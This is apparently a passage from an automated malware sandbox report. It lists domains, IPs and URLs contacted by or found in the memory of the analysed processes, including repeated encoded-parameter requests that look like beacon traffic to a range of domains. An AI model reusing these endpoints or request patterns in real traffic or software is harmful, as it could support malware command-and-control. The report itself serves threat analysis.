            http://www.bb58cc.com/sq05/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/priority-queue.min.js?ver=422e19e9d48b269c52190%Avira URL Cloudsafe
            http://www.quiluxx.top/snq6/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/data-controls.min.js?ver=fe4ccc8a1782ea8e2cb10%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a10%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=10%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/escape-html.min.js?ver=03e27a7b6ae14f7afaa60%Avira URL Cloudsafe
            http://www.mysticriverpath.com/6vu8/0%Avira URL Cloudsafe
            http://www.3333711m14.shop/fl6s/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3ca0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/hoverIntent.min.js?ver=1.10.20%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ve0%Avira URL Cloudsafe
            http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_sl0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-admin/admin-ajax.php?action=rest-nonce0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-registry.0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.20%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/fl-icons.css?ver=3.120%Avira URL Cloudsafe
            http://www.iitaccounting.com/nbaz/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=6.4.30%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react.min.js?ver=18.2.00%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/shipping-info/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/0%Avira URL Cloudsafe
            http://www.quixaclienti.com/7ein/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/is-shallow-equal.min.js?ver=20c2b06ecf04afb14fee0%Avira URL Cloudsafe
            http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-components.j0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-checkout.js?0%Avira URL Cloudsafe
            http://www.onlandtoy.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js?ver=1.8.20%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/xmlrpc.php0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/conditions-of-use/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/feed/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/libs/ie-flexibility.js0%Avira URL Cloudsafe
            http://www.onlandtoy.com/pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            http://www.focusonsocials.com/rbwl/0%Avira URL Cloudsafe
            http://www.bestandpure.com/xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            http://www.bestandpure.com/xifn/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/uploads/2024/06/cropped-pngtree-ship-logo-cruise-or-ship-log0%Avira URL Cloudsafe
            http://www.lmsforsme.com/0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/product-category/permatex/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=6.4.30%Avira URL Cloudsafe
            http://www.kundalisathi.com/esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-data.js?v0%Avira URL Cloudsafe
            https://wordpress.org/plugins/woocommerce-conversion-tracking/)0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/element.min.js?ver=ed1c7604880e8b574b400%Avira URL Cloudsafe
            http://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/product-category/esf/0%Avira URL Cloudsafe
            http://www.kera333.org/9grl/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.0%Avira URL Cloudsafe
            http://www.kera333.org/9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/style.css?ver=6.4.30%Avira URL Cloudsafe
            http://www.itsjojosiwas.com/0koa/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=6.4.30%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.30%Avira URL Cloudsafe
            http://www.onlandtoy.com/wp-includes/js/dist/interactivity.min.js?ver=6.5.20%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/deprecated.min.js?ver=73ad3591e7bc95f4777a0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/lodash.min.js?ver=4.17.190%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kundalisathi.com
            		3.33.130.190
            		truefalseunknown
            www.bestandpure.com
            		3.33.244.179
            		truefalse
              		unknown
              mysticriverpath.com
              		216.194.173.237
              		truefalseunknown
              kera333.org
              		64.46.102.70
              		truefalseunknown
              lmsforsme.com
              		3.33.130.190
              		truefalse
                		unknown
                www.focusonsocials.com
                		212.227.172.254
                		truefalseunknown
                bearclaw.bot
                		3.33.130.190
                		truefalseunknown
                quixaclienti.com
                		3.33.130.190
                		truefalseunknown
                www.itsjojosiwas.com
                		172.67.196.1
                		truefalseunknown
                www.quiluxx.top
                		203.161.41.205
                		truefalseunknown
                www.onlandtoy.com
                		43.157.128.107
                		truefalseunknown
                www.bb58cc.com
                		103.176.91.154
                		truefalseunknown
                www.rtpdewata4d-16.xyz
                		104.21.89.46
                		truetrue
                  		unknown
                  nbq.ssywan.com
                  		23.105.215.248
                  		truefalse
                    		unknown
                    iitaccounting.com
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.mysticriverpath.com
                      		unknown
                      		unknowntrueunknown
                      www.iitaccounting.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.quixaclienti.com
                        		unknown
                        		unknowntrueunknown
                        www.kundalisathi.com
                        		unknown
                        		unknowntrueunknown
                        www.kera333.org
                        		unknown
                        		unknowntrueunknown
                        www.quests-galxe.com
                        		unknown
                        		unknowntrueunknown
                        www.bearclaw.bot
                        		unknown
                        		unknowntrueunknown
                        www.lmsforsme.com
                        		unknown
                        		unknowntrueunknown
                        www.3333711m14.shop
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.mysticriverpath.com/6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.rtpdewata4d-16.xyz/1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bearclaw.bot/f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.itsjojosiwas.com/0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bb58cc.com/sq05/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.quiluxx.top/snq6/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mysticriverpath.com/6vu8/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.3333711m14.shop/fl6s/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.iitaccounting.com/nbaz/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.quixaclienti.com/7ein/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.focusonsocials.com/rbwl/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bestandpure.com/xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bestandpure.com/xifn/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.lmsforsme.com/0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.kundalisathi.com/esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.kera333.org/9grl/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.kera333.org/9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.itsjojosiwas.com/0koa/false
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabmakecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/data.min.js?ver=dc5f255634f3da29c8d5makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/sample-page/makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/feed/makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/refund_returns/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/?s=makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/product-category/armen-living/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-settings.js?ver=makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react-dom.min.js?ver=18.2.0makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4makecab.exe, 00000006.00000002.4101618826.000000000588E000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.00000000033DE000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/ie-fallback.cssmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://connect.facebook.net/en_US/fbevents.jsmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-json/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woffmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/xmlrpc.php?rsdmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution-blomakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/product-category/pferd/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/redux-routine.min.js?ver=0be1b2a6a79703e28531makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/url.min.js?ver=b4979979018b684be209makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/keycodes.min.js?ver=3460bd0fac9859d6886cmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/xmlrpc.php?rsdmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.comrULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-middlewarmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/my-account/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/priority-queue.min.js?ver=422e19e9d48b269c5219makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/data-controls.min.js?ver=fe4ccc8a1782ea8e2cb1makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsomemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=1makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/escape-html.min.js?ver=03e27a7b6ae14f7afaa6makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://schema.orgmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.ecosia.org/newtab/makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.minmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://gmpg.org/xfn/11makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3camakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?vemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-admin/admin-ajax.php?action=rest-noncemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-registry.makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/fl-icons.css?ver=3.12makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
